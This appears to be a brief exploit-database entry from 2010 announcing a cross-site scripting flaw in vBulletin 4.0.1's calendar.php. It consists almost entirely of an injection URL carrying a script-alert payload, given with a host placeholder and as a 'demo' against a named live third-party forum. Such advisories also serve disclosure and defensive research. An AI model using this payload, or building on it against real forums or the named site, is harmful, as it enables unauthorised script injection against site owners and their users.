id: 10931
date: 02/15/2010
title: vBulletin v 4.0.1 XSS Vulnerability
author: W4n73d
cves: 

===================================
vBulletin v 4.0.1 XSS Vulnerability
===================================

[+] Script: vBulletin Version 4.0.1
[+] Vendor: www.vbulletin.com
[+] Author: W4n73d

[~] Bug: Cross Site Scripting (XSS)
[~] Exploit: http://[HOST]/forum/calendar.php="<script>alert("! XSS
!");</script>
[~] Demo: http://www.overbr.com.br/forum/calendar.php="<script>alert("! XSS
!");</script>




#  0day.today [2023-03-22]  #